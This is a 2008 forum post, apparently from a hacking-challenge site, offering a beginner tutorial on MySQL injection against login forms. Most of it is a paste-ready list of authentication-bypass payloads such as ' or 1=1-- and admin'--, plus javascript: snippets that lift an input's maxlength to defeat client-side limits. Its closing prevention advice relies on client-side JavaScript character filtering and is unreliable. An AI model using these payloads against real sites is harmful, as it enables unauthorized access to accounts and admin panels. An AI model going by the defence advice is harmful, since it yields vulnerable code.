Basic Mysql Injection/Prevention

Put your programming skills to the test in these challenges.

Basic Mysql Injection/Prevention

Post by AbaxHacker on Wed Aug 20, 2008 5:59 pm
([msg=10142]see Basic Mysql Injection/Prevention[/msg])

Basic Mysql Injection
A tutorial by Abax

Introduction:
Many "Script Kiddes", out there try to use injections to their advantage, I will show you how to simple injections,

and slightly advanced, as well as help protecting your self from these so called "MySQL Injections".

Requirements:
- Basic Html Knowledge
- Basic Javascript Knowledge
- Basic MySQL Knowledge
- A site that is open to this attack, or make one =)

Basic Outline:
Every time to time their is one person that will try to attack your site, or heck it could be you trying to use

mysql injections,but it comes down to the fact that you need to know how, if your big with site creation/devlopment

or maintenance/security. So their are many types of attacks but the worst, and possibly easist would be a MySql

injection or a Server Side Include.

In this case lets say you made a site that uses' mysql to store/receive data, and maybe its for an administrator

panel or member login, any the do you need it to be secure by many reasons, so whats the best way to protect

yourself, some client side protections and some server side protections, but before we can think of protecting we

have to do so.

The most common sql injection know would be to go to an admin panel, plop in an injection and gain control to the

site, which is a huge no-no. So how is this done? A couple ways heck a lot. I will be cover the basics and some

more advanced later on in a different tutorial.

So if we look at this code what does this do to mysql?

Code: Select all
'or''='


If you now some "MySql Scripting", you would now that it tells it to select from null or usally the admin

username/password dependent on the field. So thats one and their can be many for example a huge list i have:

1'or'1'='1

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

So you get the point that all it is doing is selecting the appropriate table, now if we injected this into a form

for admin login we could very easy gain access which ain't bad for Ctrl+Copy and Ctrl+Pasting this small code.

But there is a small problem depending on the site it may restrict certian characters or only give you 6 character

spaces to work with this is were some common sense, JavaScript injection and html coding comes into play.

This is probably the most important part except for the security. You will need to make some sort of code to make

the inputs maxlength var bigger or delete a javascript function that cleans, or even disable server side practice

which is really hard. But to be nice I will explain some basic javascript injection so you can make some things

work out, if you havent you should look at the nice Javascript Injection tutorial which explains it, and the code.

Make "password" maxlength value 30:

Code: Select all
javascript:void(document.forms[0].password.maxlength=30)


Check it with:

Code: Select all
javascript:alert(document.forms[0].password.maxlength)


Now that you can see a basic way to exploiting some unsafe sites, how do you make yours safer? Mainly by blocking

input, checking for refer url, checking length of fields, and making a server side checker so that its almost

unbeatable. I will only cover a fraction, and this is were you have to code a simple JavaScript function that checks

if the input is good, and based on that return an answer, I will not supply the code but give you a theory.

Check through every char and if the char is not a good char for example: ',",=,<>... Ect.
AbaxHacker
New User
New User
 
Posts: 17
Joined: Tue Aug 19, 2008 6:31 pm
Blog: View Blog (0)


Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

cron